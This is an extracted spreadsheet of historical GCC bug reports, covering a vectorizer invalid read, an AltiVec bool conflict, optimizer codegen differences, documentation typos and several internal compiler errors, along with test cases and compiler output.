Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.4.7-1ubuntu2' --with-bugurl=file:///usr/share/doc/gcc-4.4/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.4 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.4 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.4.7 (Ubuntu/Linaro 4.4.7-1ubuntu2) 
$ gcc-4.4 -O3 vectorize-bug.c -o vectorize-bug
$ valgrind --db-attach=yes ./vectorize-bug
[...]
==21132== Invalid read of size 8
==21132==    at 0x400636: main (in /tmp/vectorize-bug/vectorize-bug)
==21132==  Address 0x51f109c is 92 bytes inside a block of size 96 alloc'd
==21132==    at 0x4C29DB4: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==21132==    by 0x400612: main (in /tmp/vectorize-bug/vectorize-bug)
[...]
(gdb) disassemble $rip
[...]
   0x0000000000400632 :    shufps $0x88%xmm2%xmm0
=&gt; 0x0000000000400636 :    movdqu 0x10(%rdx)%xmm2
   0x000000000040063b :    paddd  %xmm0%xmm1
[...]
(gdb) info registers 
[...]
rdx            0x51f1084        85921924
Disabling tree vectorization with -fno-tree-vectorize fixes the issue.
I understand gcc 4.4 is no longer maintained and since gcc 4.5 and gcc 4.6 do not exhibit the bug this has probably been fixed already but I didn't find a related bug so I opted to report it anyway in case the change was a side effect of something else.</t>
  </si>
  <si>
    <t>gael.roualland</t>
  </si>
  <si>
    <t>GCC-78263</t>
  </si>
  <si>
    <t>Compile failure with AltiVec library on PPC64le and -std=c++11 flag</t>
  </si>
  <si>
    <t>Created attachment 39998
Preprocessed source source for main.cpp
GCC is unable to compile C++ code which includes the AltiVec library with -std=c++11 flag on PPC64le target.
The following code snippet will reproduce the error: 
#include 
int main(int argc char *argv[])
{
  bool test = false
  return 0
}
GCC and AltiVec both define __bool causing the code to become invalid.
One solution found is to undef the following:
#undef vector 
#undef pixel 
#undef bool 
This solution is not always straightforward for larger code bases and requires users of our tools to edit the source files of any project/example that includes the AltiVec library (e.g CL/opencl.h).
Test Case on Ubuntu 16.04 w/ kernel 4.4.0-45-generic:
gcc -v -save-temps -std=c++11 -c main.cpp
Using built-in specs.
COLLECT_GCC=gcc
Target: powerpc64le-linux-gnu
...
Thread model: posix
gcc version 5.4.0 20160609 (Ubuntu/IBM 5.4.0-6ubuntu1~16.04.2) 
...
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++11' '-c' '-mcpu=power8'
 /usr/lib/gcc/powerpc64le-linux-gnu/5/cc1plus -fpreprocessed main.ii -msecure-plt -quiet -dumpbase main.cpp -mcpu=power8 -auxbase main -std=c++11 -version -fstack-protector-strong -Wformat -Wformat-security -o main.s
GNU C++11 (Ubuntu/IBM 5.4.0-6ubuntu1~16.04.2) version 5.4.0 20160609 (powerpc64le-linux-gnu)
	compiled by GNU C version 5.4.0 20160609 GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++11 (Ubuntu/IBM 5.4.0-6ubuntu1~16.04.2) version 5.4.0 20160609 (powerpc64le-linux-gnu)
	compiled by GNU C version 5.4.0 20160609 GMP version 6.1.0 MPFR version 3.1.4 MPC version 1.0.3
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 840114473bcf0205e182c11cebcb2c2e
main.cpp: In function â€˜int main(int char**)â€™:
main.cpp:5:52: error: cannot convert â€˜boolâ€™ to â€˜__vector(4) __bool intâ€™ in initialization</t>
  </si>
  <si>
    <t>khill</t>
  </si>
  <si>
    <t>GCC-9767</t>
  </si>
  <si>
    <t>explicit instantiation of class members unoptimized?</t>
  </si>
  <si>
    <t>Apparently  explicit instantation of class templates is outputting code for member functions that is not optimized. See below. 
The codegen for the explicit instantiation of just the write member function is optimized at -02 and -O1. In particular the _M_write function is inlined. However when the same member function is instantiated during the instantiation of the whole class this member function has substantially different codegen. In particular the _M_write function is not inlined.
The only way to get this same codegen for just the instantiation of the member function itself is to use '-O0'. Ouch.
Please help!
Sample output below.
For just the member function instantiation:
_ZNSo5writeEPKci:
.LFB1548:
	pushl	%ebp
.LCFI0:
	movl	%esp %ebp
.LCFI1:
	leal	-24(%ebp) %eax
	pushl	%esi
.LCFI2:
	pushl	%ebx
.LCFI3:
	subl	$32 %esp
.LCFI4:
	movl	8(%ebp) %ebx
	movl	%eax (%esp)
	movl	16(%ebp) %esi
	movl	%ebx 4(%esp)
.LEHB0:
	call	_ZNSo6sentryC1ERSo
.LEHE0:
	cmpb	$0 -24(%ebp)
	jne	.L43
.L2:
	movl	-20(%ebp) %eax
	movl	(%eax) %edx
	movl	-12(%edx) %esi
	addl	%esi %eax
	testb	$32 13(%eax)
	jne	.L44
.L40:
	addl	$32 %esp
	movl	%ebx %eax
	popl	%ebx
	popl	%esi
	popl	%ebp
	ret
	.p2align 47
.L43:
	movl	(%ebx) %eax
	movl	-12(%eax) %edx
	leal	(%edx%ebx) %eax
	movl	124(%eax) %edx
	movl	12(%ebp) %eax
	movl	(%edx) %ecx
	movl	%esi 8(%esp)
	movl	%eax 4(%esp)
	movl	%edx (%esp)
.LEHB1:
	call	*48(%ecx)
	cmpl	%esi %eax
	je	.L2
	movl	(%ebx) %eax
	movl	%ebx %edx
	movl	-12(%eax) %ecx
	addl	%ecx %edx
	movl	20(%edx) %eax
	movl	%edx (%esp)
	orl	$1 %eax
	movl	%eax 4(%esp)
	call	_ZNSt9basic_iosIcSt11char_traitsIcEE5clearESt12_Ios_Iostate
.LEHE1:
	jmp	.L2
	.p2align 47
.L44:
	call	_ZSt18uncaught_exceptionv
	testb	%al %al
	jne	.L40
	movl	-20(%ebp) %eax
	movl	(%eax) %edx
	movl	-12(%edx) %ecx
	addl	%ecx %eax
	movl	124(%eax) %edx
	testl	%edx %edx
	je	.L40
	movl	(%edx) %eax
	movl	%edx (%esp)
.LEHB2:
	call	*24(%eax)
	incl	%eax
	jne	.L40
	movl	-20(%ebp) %eax
	movl	(%eax) %edx
	movl	-12(%edx) %esi
	addl	%esi %eax
	movl	20(%eax) %edx
	movl	%eax (%esp)
	orl	$1 %edx
	movl	%edx 4(%esp)
	call	_ZNSt9basic_iosIcSt11char_traitsIcEE5clearESt12_Ios_Iostate
	jmp	.L40
	.p2align 47
.L41:
.L11:
	movl	%eax %ebx
	movl	-20(%ebp) %eax
	movl	(%eax) %edx
	movl	-12(%edx) %ecx
	addl	%ecx %eax
	testb	$32 13(%eax)
	jne	.L45
.L25:
.L26:
	movl	%ebx (%esp)
	call	_Unwind_Resume
.LEHE2:
.L45:
	call	_ZSt18uncaught_exceptionv
	testb	%al %al
	jne	.L25
	movl	-20(%ebp) %eax
	movl	(%eax) %edx
	movl	-12(%edx) %esi
	addl	%esi %eax
	movl	124(%eax) %edx
	testl	%edx %edx
	je	.L25
	movl	(%edx) %eax
	movl	%edx (%esp)
	call	*24(%eax)
	incl	%eax
	jne	.L25
	movl	-20(%ebp) %eax
	movl	(%eax) %edx
	movl	-12(%edx) %ecx
	addl	%ecx %eax
	movl	20(%eax) %edx
	movl	%eax (%esp)
	orl	$1 %edx
	movl	%edx 4(%esp)
	call	_ZNSt9basic_iosIcSt11char_traitsIcEE5clearESt12_Ios_Iostate
	jmp	.L25
And the same function clipped from the whole class instantiation:
_ZNSo5writeEPKci:
.LFB1627:
	pushl	%ebp
.LCFI124:
	movl	%esp %ebp
.LCFI125:
	subl	$40 %esp
.LCFI126:
	movl	%ebx -8(%ebp)
.LCFI127:
	movl	8(%ebp) %ebx
	movl	%esi -4(%ebp)
.LCFI128:
	leal	-24(%ebp) %esi
	movl	%ebx 4(%esp)
	movl	%esi (%esp)
.LEHB104:
	call	_ZNSo6sentryC1ERSo
.LEHE104:
	cmpb	$0 -24(%ebp)
	je	.L813
	movl	%ebx (%esp)
	movl	16(%ebp) %eax
	movl	%eax 8(%esp)
	movl	12(%ebp) %eax
	movl	%eax 4(%esp)
.LEHB105:
	call	_ZNSo8_M_writeEPKci   &lt;--------FUCKED
.LEHE105:
.L813:
	movl	%esi (%esp)
.LEHB106:
	call	_ZNSo6sentryD1Ev
.LEHE106:
	movl	%ebx %eax
	movl	-4(%ebp) %esi
	movl	-8(%ebp) %ebx
	movl	%ebp %esp
	popl	%ebp
	ret
	.p2align 47
.L819:
.L815:
.L817:
	movl	%esi (%esp)
	movl	%eax %ebx
	call	_ZNSo6sentryD1Ev
	movl	%ebx (%esp)
.LEHB107:
	call	_Unwind_Resume
Release:
gcc version 3.4 20030217 (experimental) maybe gcc-3.3
Environment:
x86/linux
How-To-Repeat:
compile the following with '-O2 -S'
#include 
namespace std
{
#if 1
  template 
    basic_ostream&amp; 
    basic_ostream::write(const char* streamsize)
#else
   template class basic_ostream
#endif
}</t>
  </si>
  <si>
    <t>GCC-35375</t>
  </si>
  <si>
    <t>A couple of typos in links on Status of Experimental C++0x Support page</t>
  </si>
  <si>
    <t>Some links ot the page http://gcc.gnu.org/gcc-4.3/cxx0x_status.html contain typos:
strongly-typed enums paper is called N2347 (not N2437)
real N3437 (`Explicit conversion operators') has the wrong link it should refer to pdf file instead of html
link to 2346 has an unnecessary `l' correct link:  http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2007/n2346.htm</t>
  </si>
  <si>
    <t>pavel.shved</t>
  </si>
  <si>
    <t>GCC-42916</t>
  </si>
  <si>
    <t>[4.5 Regression] -fcompare-debug failure with -O1 -funroll-loops -ftree-vectorize</t>
  </si>
  <si>
    <t>Command line:
gcc -O1 -funroll-loops -ftree-vectorize -fcompare-debug -m32 -c testcase.c
(-m32 is needed for x86_64)
Tested revisions:
r156367 - crash
r155363 - crash
r153685 - crash
Output:
$ /mnt/svn/gcc-trunk/binary-156367-lto/bin/gcc -O1 -funroll-loops -ftree-vectorize -fcompare-debug -m32 -c testcase.c
gcc: testcase.c: -fcompare-debug failure (length)</t>
  </si>
  <si>
    <t>GCC-48522</t>
  </si>
  <si>
    <t>[C++0x] decltype((object)) with templated classes crashes g++ 4.5.1.</t>
  </si>
  <si>
    <t>Created attachment 23933
Preprocessed broken_decltype.cpp
Hello All
The following innocent-looking code crashes the compiler:
template 
struct Handle
{
    Handle(T
}
template
struct Class {
    struct Struct {} data
    void f()
    void g()
}
template
void Class::f() {
    Handle handle(data)
}
template
void Class::g() {
    Handle handle(data)
}
The command line and compiler output were:
g++ -std=g++0x broken_decltype.cpp (see attachment for detailed flags)
broken_decltype.cpp: In member function â€˜void Class::g()â€™:
broken_decltype.cpp:21:30: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate
This fails on multiple distributions including Linux 2.6.35.6-45.fc14.x86_64
GNU C++ (GCC) version 4.5.1 20100924 (Red Hat 4.5.1-4) (x86_64-redhat-linux)
compiled by GNU C version 4.5.1 20100924 (Red Hat 4.5.1-4) GMP version 4.3.1 MPFR version 2.4.2 MPC version 0.8.1
Cheers!
David.</t>
  </si>
  <si>
    <t>GCC-64257</t>
  </si>
  <si>
    <t>JIT documentation is not yet on the GCC website</t>
  </si>
  <si>
    <t>See notes here:
  https://gcc.gnu.org/ml/gcc/2014-11/msg00164.html
on how to do this.</t>
  </si>
  <si>
    <t>GCC-52248</t>
  </si>
  <si>
    <t>[4.7 Regression] timevar ICE</t>
  </si>
  <si>
    <t>// { dg-do compile }
// { dg-options -ftime-report }
void
foo ()
{
  __asm goto ( : : : : lab)
}
ICEs with:
rh790221-4.C: In function â€˜void foo()â€™:
rh790221-4.C:7:26: error: label â€˜labâ€™ used but not defined
rh790221-4.C:8:1: internal compiler error: in timevar_start at timevar.c:344
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Caused by the http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=173277 commit.</t>
  </si>
  <si>
    <t>GCC-40430</t>
  </si>
  <si>
    <t>collect2.c fails to compile: new qualifiers in middle of multi-level non-const cast are unsafe</t>
  </si>
  <si>
    <t>Between 20090522 (rev 147798) and 20090612 (rev 148427) collect2.c failed to
compile in stage2:
/vol/gccsrc/obj/gcc-4.5.0-20090612/6.5-gcc/./prev-gcc/xgcc -B/vol/gccsrc/obj/gcc-4.5.0-20090612/6.5-gcc/./prev-gcc/ -B/vol/gcc/mips-sgi-irix6.5/bin/ -B/vol/gcc/mips-sgi-irix6.5/bin/ -B/vol/gcc/mips-sgi-irix6.5/lib/ -isystem /vol/gcc/mips-sgi-irix6.5/include -isystem /vol/gcc/mips-sgi-irix6.5/sys-include     -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wcast-qual -Wold-style-definition -Wc++-compat -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H -I. -I. -I/vol/gcc/src/gcc-dist/gcc -I/vol/gcc/src/gcc-dist/gcc/. -I/vol/gcc/src/gcc-dist/gcc/../include -I/vol/gcc/src/gcc-dist/gcc/../libcpp/include -I/vol/gcc/include -I/vol/gcc/include -I/vol/gcc/src/gcc-dist/gcc/../libdecnumber -I/vol/gcc/src/gcc-dist/gcc/../libdecnumber/dpd -I../libdecnumber     \
	-DTARGET_MACHINE=\mips-sgi-irix6.5\ \
	-c /vol/gcc/src/gcc-dist/gcc/collect2.c -o collect2.o 
cc1: warnings being treated as errors
/vol/gcc/src/gcc-dist/gcc/collect2.c: In function 'main':
/vol/gcc/src/gcc-dist/gcc/collect2.c:1170:8: error: new qualifiers in middle of multi-level non-const cast are unsafe
I don't even understand what this message is supposed to mean.
It was probably introduced by this patch:
2009-06-01  Ian Lance Taylor  
	* attribs.c (register_attribute): Use CONST_CAST.
	* collect2.c (main): Use CONST_CAST2.
	(scan_prog_file): Likewise.
	* gcc.c (process_command main): Likewise.
	* toplev.c (toplev_main): Likewise.
	* c-typeck.c (handle_warn_cast_qual): New static function
	partially broken out of build_c_cast.
	(build_c_cast): Call handle_warn_cast_qual.
	* doc/invoke.texi (Warning Options): Document new effect of
	-Wcast-qual.</t>
  </si>
  <si>
    <t>GCC-13899</t>
  </si>
  <si>
    <t>[x86] -mfpmath misdocumented</t>
  </si>
  <si>
    <t>-mfpmath=X takes an argument X indicating what floating point 
units to use. The manual in invoke.texi lists these choices: 
---------------- 
@item -mfpmath=@var{unit} 
@opindex march 
generate floating point arithmetics for selected unit @var{unit}.  the choices 
for @var{unit} are: 
@table @samp 
@item 387 
Use the standard 387 floating point coprocessor present majority of chips and 
emulated otherwise.  Code compiled with this option will run almost 
everywhere. 
The temporary results are computed in 80bit precision instead of precision 
specified by the type resulting in slightly different results compared to most 
of other chips. See @option{-ffloat-store} for more detailed description. 
This is the default choice for i386 compiler. 
@item sse 
.... 
@item pni 
Use all SSE extensions enabled by @option{-msse2} as well as the new 
SSE extensions in Prescott New Instructions. @option{-mpni} also 
enables 2 builtin functions @code{__builtin_ia32_monitor} and 
@code{__builtin_ia32_mwait} for new instructions @code{monitor} and 
@code{mwait}. 
@item sse387 
.... 
@end table 
However compiling any program with -mfpmath=pni on any branch I 
have gives me this: 
g/x&gt; /home/bangerth/bin/gcc-3.5-pre/bin/c++ -march=pentium4 -mfpmath=pni -c 
x.cc 
x.cc:0: error: bad value (pni) for -mfpmath= switch 
If this value is really not allowed then it should be fixed on 
all active branches in the manual. If it is allowed then the 
bug is somewhere in the option handling. 
W.</t>
  </si>
  <si>
    <t>GCC-44245</t>
  </si>
  <si>
    <t>ICE: in extract_insn at recog.c:2048 when __builtin_ia32_crc32di is used</t>
  </si>
  <si>
    <t>Compiler output:
$ /mnt/svn/gcc-trunk/binary-159696-lto-fortran/bin/gcc testcase.c
testcase.c: In function 'foo':
testcase.c:4:1: error: unrecognizable insn:
(insn 7 6 8 3 testcase.c:3 (set (reg:DI 58 [ D.2717 ])
        (unspec:DI [
                (reg:DI 61)
                (reg:DI 62)
            ] 143)) -1 (nil))
testcase.c:4:1: internal compiler error: in extract_insn at recog.c:2099
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
--------- testcase.c ---------
int foo()
{
  return __builtin_ia32_crc32di(0 0)
}
------------------------------
Tested revisions:
r159696 - crash
4.5 r158978 - crash (with checking)
4.4 r158133 - crash (with checking)
4.3.4 4.4.3 - different crash (without checking)
4.1.2 4.2.4 - __builtin_ia32_crc32di() is not builtin</t>
  </si>
  <si>
    <t>GCC-21436</t>
  </si>
  <si>
    <t>imports not remembered for previously compiled files</t>
  </si>
  <si>
    <t>With a patch to compile libjava on a per-directory basis I found a bug with imports
Take file AWTEvent.java
   package java.awt
   import java.util.EventObject
   public abstract class AWTEvent extends EventObject {}
and file B.java
   package java.awt
   import java.awt.event.ComponentEvent
   public class B {
     Object[] o = ComponentEvent.class.getFields()
   }
When processing ComponentEvent in B.java it finds AWTEvent (the superclass of
ComponentEvent) but it cannot resolve the EventObject class there.  That's
because java_complete_class was not called yet for AWTEvent and its
TYPE_IMPORTS_LIST is not set yet.
If I move the setting of TYPE_IMPORS_LIST to create_class then in
maybe_layout_super_class another bug is hit and the TYPE_IMPORTS_LIST of
AWTEvent is not used to resolve the EventObject class.  I have a patch to fix
all this but I have not tested it yet and it does not allow anyway to finish
bootstrap with per-directory builds.  I suspect a (theoretically) simpler fix is
to call java_complete_class earlier (at least once per file) but I am not sure
about what java_complete_class is doing at all.
Paolo</t>
  </si>
  <si>
    <t>GCC-79288</t>
  </si>
  <si>
    <t>[7 Regression] TLS model wrong for static data members since r241137</t>
  </si>
  <si>
    <t>Since r241137
struct S
{
  static __thread int *p
}
int *
foo ()
{
  return S::p
}
emits for non-pic code TLS local exec model relocations instead of initial exec.</t>
  </si>
  <si>
    <t>GCC-33241</t>
  </si>
  <si>
    <t>ICE with parameter string arrays</t>
  </si>
  <si>
    <t>When I try to compile the following file (attached at the end. quite big) I get the folloring message
onefile.F90: In function â€˜MAIN__â€™:
onefile.F90:778: internal compiler error: in gfc_get_symbol_decl at fortran/trans-decl.c:1020
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Compilation options: gfortran-4.3 -save-temps onefile.F90 -Wall
System: OpenSuse 10.2 64 bit
gcc configure options (gcc-4.3 -v) :
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --prefix=/home/vip/programs/gcc --enable-threads=posix --enable-languages=fortran --enable-checking=release --enable-ssp --disable-libssp --disable-libgcj --with-system-zlib --disable-shared --program-suffix=-4.3 --enable-version-specific-runtime-libs --without-system-libunwind --enable-static : (reconfigured) ../configure --prefix=/home/vip/programs/gcc --enable-threads=posix --enable-languages=fortran --enable-checking=release --enable-ssp --disable-libssp --disable-libgcj --with-system-zlib --disable-shared --program-suffix=-4.3 --enable-version-specific-runtime-libs --without-system-libunwind --enable-static
Thread model: posix
gcc version 4.3.0 20070821 (experimental) (GCC)
Source file:
MODULE parameters
  !--------- -------- --------- --------- --------- --------- --------- --------- -----
  ! Specify data types
  !--------- -------- --------- --------- --------- --------- --------- --------- -----
  IMPLICIT NONE
  INTEGER PARAMETER :: rn = KIND(0.0d0)          ! Precision of real numbers
  INTEGER PARAMETER :: is = SELECTED_INT_KIND(1) ! Data type of bytecode
END MODULE parameters
MODULE fparser
  !------- -------- --------- --------- --------- --------- --------- --------- -------
  ! Fortran 90 function parser v1.0
  !------- -------- --------- --------- --------- --------- --------- --------- -------
  !
  ! This public domain function parser module is intended for applications
  ! where a set of mathematical expressions is specified at runtime and is
  ! then evaluated for a large number of variable values. This is done by
  ! compiling the set of function strings into byte code which is interpreted
  ! very efficiently for the various variable values.
  !
  ! The source code is available from:
  ! http://www.its.uni-karlsruhe.de/~schmehl/opensource/fparser-v1.0.tar.gz
  !
  ! Please send comments corrections or questions to the author:
  ! Roland Schmehl 
  !
  !------- -------- --------- --------- --------- --------- --------- --------- -------
  ! The function parser concept is based on a C++ class library written by Warp
  !  available from:
  ! http://www.students.tut.fi/~warp/FunctionParser/fparser.zip
  !------- -------- --------- --------- --------- --------- --------- --------- -------
  USE parameters ONLY: rnis               ! Import KIND parameters
  IMPLICIT NONE
  !------- -------- --------- --------- --------- --------- --------- --------- -------
  PUBLIC                     :: initf    &amp; ! Initialize function parser for n functions
                                parsef   &amp; ! Parse single function string
                                evalf    &amp; ! Evaluate single function
                                EvalErrMsg  ! Error message (Use only when EvalErrType&gt;0)
  INTEGER PUBLIC            :: EvalErrType ! =0: no error occured &gt;0: evaluation error
  !------- -------- --------- --------- --------- --------- --------- --------- -------
  PRIVATE
  SAVE
  INTEGER(is)                              PARAMETER :: cImmed   = 1          &amp;
                                                         cNeg     = 2          &amp;
                                                         cAdd     = 3          &amp;
                                                         cSub     = 4          &amp;
                                                         cMul     = 5          &amp;
                                                         cDiv     = 6          &amp;
                                                         cPow     = 7          &amp;
                                                         cAbs     = 8          &amp;
                                                         cExp     = 9          &amp;
                                                         cLog10   = 10         &amp;
                                                         cLog     = 11         &amp;
                                                         cSqrt    = 12         &amp;
                                                         cSinh    = 13         &amp;
                                                         cCosh    = 14         &amp;
                                                         cTanh    = 15         &amp;
                                                         cSin     = 16         &amp;
                                                         cCos     = 17         &amp;
                                                         cTan     = 18         &amp;
                                                         cAsin    = 19         &amp;
                                                         cAcos    = 20         &amp;
                                                         cAtan    = 21         &amp;
                                                         VarBegin = 22
  CHARACTER (LEN=1) DIMENSION(cAdd:cPow)  PARAMETER :: Ops      = (/ '+'     &amp;
                                                                       '-'     &amp;
                                                                       '*'     &amp;
                                                                       '/'     &amp;
                                                                       '^' /)
  CHARACTER (LEN=5) DIMENSION(cAbs:cAtan) PARAMETER :: Funcs    = (/ 'abs  ' &amp;
                                                                       'exp  ' &amp;
                                                                       'log10' &amp;
                                                                       'log  ' &amp;
                                                                       'sqrt ' &amp;
                                                                       'sinh ' &amp;
                                                                       'cosh ' &amp;
                                                                       'tanh ' &amp;
                                                                       'sin  ' &amp;
                                                                       'cos  ' &amp;
                                                                       'tan  ' &amp;
                                                                       'asin ' &amp;
                                                                       'acos ' &amp;
                                                                       'atan ' /)
  TYPE tComp
     INTEGER(is) DIMENSION(:) POINTER :: ByteCode
     INTEGER                            :: ByteCodeSize
     REAL(rn)    DIMENSION(:) POINTER :: Immed
     INTEGER                            :: ImmedSize
     REAL(rn)    DIMENSION(:) POINTER :: Stack
     INTEGER                            :: StackSize &amp;
                                           StackPtr
  END TYPE tComp
  TYPE (tComp)  DIMENSION(:)  POINTER :: Comp              ! Bytecode
  INTEGER   DIMENSION(:)  ALLOCATABLE :: ipos              ! Associates function strings
  !
CONTAINS
  !
  SUBROUTINE initf (n)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Initialize function parser for n functions
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    INTEGER INTENT(in) :: n                                 ! Number of functions
    INTEGER             :: i
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ALLOCATE (Comp(n))
    DO i=1n
       NULLIFY (Comp(i)%ByteCodeComp(i)%ImmedComp(i)%Stack)
    END DO
  END SUBROUTINE initf
  !
  SUBROUTINE parsef (i FuncStr Var)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Parse ith function string FuncStr and compile it into bytecode
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    INTEGER                         INTENT(in) :: i         ! Function identifier
    CHARACTER (LEN=*)               INTENT(in) :: FuncStr   ! Function string
    CHARACTER (LEN=*) DIMENSION(:) INTENT(in) :: Var       ! Array with variable names
    CHARACTER (LEN=LEN(FuncStr))                :: Func      ! Function string local use
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IF (i  SIZE(Comp)) THEN
       WRITE(**) '*** Parser error: Function number 'i' out of range'
       STOP
    END IF
    ALLOCATE (ipos(LEN_TRIM(FuncStr)))                       ! Char. positions in orig. string
    Func = FuncStr                                           ! Local copy of function string
    CALL Replace ('**''^ 'Func)                            ! Exponent into 1-Char. format
    CALL RemoveSpaces (Func)                                 ! Condense function string
    CALL CheckSyntax (FuncFuncStrVar)
    DEALLOCATE (ipos)
    CALL Compile (iFuncVar)                                ! Compile into bytecode
  END SUBROUTINE parsef
  !
  FUNCTION evalf (i Val) RESULT (res)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Evaluate bytecode of ith function for the values passed in array Val(:)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    INTEGER                INTENT(in) :: i                  ! Function identifier
    REAL(rn) DIMENSION(:) INTENT(in) :: Val                ! Variable values
    REAL(rn)                           :: res                ! Result
    INTEGER                            :: IP              &amp; ! Instruction pointer
                                          DP              &amp; ! Data pointer
                                          SP                 ! Stack pointer
    REAL(rn)                PARAMETER :: zero = 0._rn
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    DP = 1
    SP = 0
    DO IP=1Comp(i)%ByteCodeSize
       SELECT CASE (Comp(i)%ByteCode(IP))
       CASE (cImmed) SP=SP+1 Comp(i)%Stack(SP)=Comp(i)%Immed(DP) DP=DP+1
       CASE   (cNeg) Comp(i)%Stack(SP)=-Comp(i)%Stack(SP)
       CASE   (cAdd) Comp(i)%Stack(SP-1)=Comp(i)%Stack(SP-1)+Comp(i)%Stack(SP) SP=SP-1
       CASE   (cSub) Comp(i)%Stack(SP-1)=Comp(i)%Stack(SP-1)-Comp(i)%Stack(SP) SP=SP-1
       CASE   (cMul) Comp(i)%Stack(SP-1)=Comp(i)%Stack(SP-1)*Comp(i)%Stack(SP) SP=SP-1
       CASE   (cDiv) IF (Comp(i)%Stack(SP)==0._rn) THEN EvalErrType=1 res=zero RETURN ENDIF
                      Comp(i)%Stack(SP-1)=Comp(i)%Stack(SP-1)/Comp(i)%Stack(SP) SP=SP-1
       CASE   (cPow) Comp(i)%Stack(SP-1)=Comp(i)%Stack(SP-1)**Comp(i)%Stack(SP) SP=SP-1
       CASE   (cAbs) Comp(i)%Stack(SP)=ABS(Comp(i)%Stack(SP))
       CASE   (cExp) Comp(i)%Stack(SP)=EXP(Comp(i)%Stack(SP))
       CASE (cLog10) IF (Comp(i)%Stack(SP)&lt;=0._rn) THEN EvalErrType=3 res=zero RETURN ENDIF
                      Comp(i)%Stack(SP)=LOG10(Comp(i)%Stack(SP))
       CASE   (cLog) IF (Comp(i)%Stack(SP)&lt;=0._rn) THEN EvalErrType=3 res=zero RETURN ENDIF
                      Comp(i)%Stack(SP)=LOG(Comp(i)%Stack(SP))
       CASE  (cSqrt) IF (Comp(i)%Stack(SP)&lt;0._rn) THEN EvalErrType=3 res=zero RETURN ENDIF
                      Comp(i)%Stack(SP)=SQRT(Comp(i)%Stack(SP))
       CASE  (cSinh) Comp(i)%Stack(SP)=SINH(Comp(i)%Stack(SP))
       CASE  (cCosh) Comp(i)%Stack(SP)=COSH(Comp(i)%Stack(SP))
       CASE  (cTanh) Comp(i)%Stack(SP)=TANH(Comp(i)%Stack(SP))
       CASE   (cSin) Comp(i)%Stack(SP)=SIN(Comp(i)%Stack(SP))
       CASE   (cCos) Comp(i)%Stack(SP)=COS(Comp(i)%Stack(SP))
       CASE   (cTan) Comp(i)%Stack(SP)=TAN(Comp(i)%Stack(SP))
       CASE  (cAsin) IF ((Comp(i)%Stack(SP)1._rn)) THEN
                      EvalErrType=4 res=zero RETURN ENDIF
                      Comp(i)%Stack(SP)=ASIN(Comp(i)%Stack(SP))
       CASE  (cAcos) IF ((Comp(i)%Stack(SP)1._rn)) THEN
                      EvalErrType=4 res=zero RETURN ENDIF
                      Comp(i)%Stack(SP)=ACOS(Comp(i)%Stack(SP))
       CASE  (cAtan) Comp(i)%Stack(SP)=ATAN(Comp(i)%Stack(SP))
       CASE  DEFAULT SP=SP+1 Comp(i)%Stack(SP)=Val(Comp(i)%ByteCode(IP)-VarBegin+1)
       END SELECT
    END DO
    EvalErrType = 0
    res = Comp(i)%Stack(1)
  END FUNCTION evalf
  !
  SUBROUTINE CheckSyntax (FuncFuncStrVar)
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    ! Check syntax of function string  returns 0 if syntax is ok
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    IMPLICIT NONE
    CHARACTER (LEN=*)               INTENT(in) :: Func      ! Function string without spaces
    CHARACTER (LEN=*)               INTENT(in) :: FuncStr   ! Original function string
    CHARACTER (LEN=*) DIMENSION(:) INTENT(in) :: Var       ! Array with variable names
    INTEGER(is)                                 :: n
    CHARACTER (LEN=1)                           :: c
    REAL(rn)                                    :: r
    LOGICAL                                     :: err
    INTEGER                                     :: ParCnt &amp; ! Parenthesis counter
                                                   jibinlFunc
    !----- -------- --------- --------- --------- --------- --------- --------- -------
    j = 1
    ParCnt = 0
    lFunc = LEN_TRIM(Func)
    step: DO
       IF (j &gt; lFunc) CALL ParseErrMsg (j FuncStr)
       c = Func(j:j)
       !-- -------- --------- --------- --------- --------- --------- --------- -------
       ! Check for valid operand (must appear)
       !-- -------- --------- --------- --------- --------- --------- --------- -------
       IF (c == '-' .OR. c == '+') THEN                      ! Check for leading - or +
          j = j+1
          IF (j &gt; lFunc) CALL ParseErrMsg (j FuncStr 'Missing operand')
          c = Func(j:j)
          IF (ANY(c == Ops)) CALL ParseErrMsg (j FuncStr 'Multiple operators')
       END IF
       n = MathFunctionIndex (Func(j:))
